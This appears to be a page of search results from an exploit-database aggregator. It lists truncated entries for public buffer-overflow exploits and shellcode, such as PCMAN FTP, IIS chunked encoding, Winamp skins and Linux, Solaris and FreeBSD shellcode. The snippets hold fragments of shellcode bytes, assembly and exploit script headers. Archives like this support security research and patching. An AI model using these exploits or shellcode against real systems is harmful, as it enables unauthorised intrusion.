7260 matches found
HP-UX 11 Software Distributor Lang Environment Variable Local Buffer Overrun Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8986/info HP has reported that some Software Distributor SD utilities are prone to a locally exploitable buffer-overrun vulnerability. Affected utilities include swinstall1M and swverify1M. / Program : xhpux11isw.c Use :...
win32 SEH omelet shellcode 0.1
No description provided by source. A small piece of shellcode written in assembler that can scan the user-land address space for small blocks of memory eggs and recombine the eggs into one large block. When done, the large block is executed. This is useful when you can only insert small blocks at...
Free MP3 CD Ripper 2.6 - 0day (2)
No description provided by source. Exploit Title: Free MP3 CD Ripper 2.6 0 day Date: 30/03/2010 Author: Richard leahy Reference: http://www.exploit-db.com/exploits/11975 Software Link: http://www.soft32.com/Download/Free/FreeMP3CDRipper/4-250188-1.html Version: 2.6 Tested on: Windows Xp Sp2 to...
Ada Image Server <= 0.6.7 imgsrv.exe Buffer Overflow
No description provided by source. !/usr/bin/python Only usable module with safeseh disabled on XP SP2 and XP SP3 is imgsrv.exe. However, it contains a null character in the address ex: XP SP3 = 00689aff. Versions above 0.6.7 do not seem to be vulnerable. $ ./imgsrv.py 192.168.1.146 Ada Image...
PSOProxy 0.91 Remote Buffer Overflow Vulnerability (2)
No description provided by source. source: http://www.securityfocus.com/bid/9706/info It has been reported that PSOProxy is prone to a remote buffer overflow vulnerability. The issue is due to the insufficient boundary checking. A malicious user may exploit this condition to potentially corrupt...
Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (2)
No description provided by source. source: http://www.securityfocus.com/bid/4485/info A heap overflow condition in the 'chunked encoding transfer mechanism' related to Active Server Pages has been reported for Microsoft IIS Internet Information Services. This condition affects IIS 4.0 and IIS 5.0...
PCMAN FTP 2.07 ABOR Command - Buffer Overflow Exploit
No description provided by source. Exploit Title: PCMAN FTP 2.07 ABOR Command Buffer Overflow Date: Jan 25,2014 Exploit Author: Mahmod Mahajna Mahy Version: 2.07 Tested on: Windows 7 sp1 x64 english Email: [email protected] import socket as s from sys import argv iflenargv != 4: print USAGE: %s...
Linux x86 - /bin/sh 8 bytes
No description provided by source. / 08048334 main: 8048334: 99 cltd 8048335: 6a 0b push $0xb 8048337: 58 pop %eax 8048338: 60 pusha 8048339: 59 pop %ecx 804833a: cd 80 int $0x80 using this code. step1. This code is compiled. step2. strace -x output binary step3. get execve args in strace result...
Macromedia Flash 6.0.47 .0 SWRemote Heap Corruption Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/6196/info A buffer overrun condition has been discovered in the SWRemote parameter used in Macromedia Flash objects. By triggering the overrun it is possible for an attacker to corrupt sensitive heap memory. Exploiting th...
Easy File Sharing FTP Server 3.5 - Stack Buffer Overflow
No description provided by source. !/usr/bin/env python Exploit Title: Easy File Sharing FTP Server 3.5 stack buffer overflow Date: 27 May 2014 Exploit Author: superkojiman - http://www.techorganic.com Vulnerability discovered by: h07 CVE: CVE-2006-3952 OSVDB: 27646 Vendor Homepage:...
Winamp <= 5.541 Skin Universal Buffer Overflow Exploit
No description provided by source. !/usr/bin/perl WinAmp = 5.541 Skin Universal Buffer Overflow Exploit Discovered and Exploited by SkD [email protected] ----------------------------------------------------- WinAmp = http://www.winamp.com Who doesn't use WinAmp? This was an 0day for sometime but...
MIPS Linux XOR Shellcode Encoder (60 Bytes)
No description provided by source. include fcntl.h include stdio.h include unistd.h include sys/types.h include sys/stat.h include stdlib.h include string.h define DEBUG 0 / entropy at phiral.net mips linux shellcode xor encoder \xAB\xCD is overwritten with jmp back offset \x00\x00 is overwritten...
PSOProxy 0.91 Remote Buffer Overflow Vulnerability (1)
No description provided by source. source: http://www.securityfocus.com/bid/9706/info It has been reported that PSOProxy is prone to a remote buffer overflow vulnerability. The issue is due to the insufficient boundary checking. A malicious user may exploit this condition to potentially corrupt...
freebsd/x86 setuid(0); execve(ipf -Fa); shellcode 57 bytes
No description provided by source. ; sm4x - 2008 ; setuid0; execve//sbin/ipf, //sbin/ipf, -Faa, 0, 0; ; 57 bytes ; FreeBSD 7.0-RELEASE global start start: main: ; --------------------- setuid 0 xor eax, eax xor ecx, ecx push eax push eax mov al, 0x17 int 0x80 ; --------------------- -Faa xor eax,...
Solaris/x86 - execve("/bin/sh","/bin/sh",NULL) - 27 bytes
No description provided by source. / Title: Solaris/x86 - execve/bin/sh,/bin/sh,NULL - 27 bytes Author: Jonathan Salwan submit AT shell-storm.org Web: http://www.shell-storm.org Twitter: http://twitter.com/jonathansalwan Date: 2010-05-19 Tested: SunOS opensolaris 5.11 snv111b i86pc i386 i86pc...
Windows Seven Pro SP1 64 Fr (Beep) Shellcode 39 Bytes
No description provided by source. include stdio.h char shellcode = \x31\xC9 //xor ecx, ecx \x64\x8B\x71\x30 //mov esi, fs:ecx+0x30 \x8B\x76\x0C //mov esi, esi+0x0C \x8B\x76\x1C //mov esi, esi+0x1c \x8B\x06 //mov eax, esi \x8B\x68\x08 //mov ebp, eax+0x08 \x68\x11\x11\x11\x11 //push 0x11111111...
Winace UnAce 2.2 Command Line Argument Buffer Overflow Vulnerability (1)
No description provided by source. source: http://www.securityfocus.com/bid/9002/info UnAce has been reported to be prone to a buffer overflow vulnerability. The issue presents itself when UnAce handles ace filenames that are of excessive length. When this filename is passed to the UnAce utility ...
Freefloat FTP Server MKD Buffer Overflow (MSF)
No description provided by source. require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp def initializeinfo = superupdateinfoinfo, 'Name' = 'Freefloat FTP Server MKD Command Stack Overflow', 'Description' = %q This module exploits a buff...
Linux kernel <= 2.2.18 ptrace/execve Race Condition Vulnerability (1)
No description provided by source. source: http://www.securityfocus.com/bid/2529/info The Linux kernel is the core of all distributions of the Linux Operating System. It was originally written by Linus Torvalds, and is maintained by a community of developers. A problem in the Linux Kernel could...
Sielco Sistemi Winlog <= 2.07.16 Buffer Overflow
No description provided by source. !/usr/bin/ruby Exploit Title: Sielco Sistemi Winlog Buffer Overflow = v2.07.16 Date: 05.06.2012 Exploit Author: m1k3 Vendor Homepage: http://www.sielcosistemi.com/en/download/public/winloglite.html Software Link:...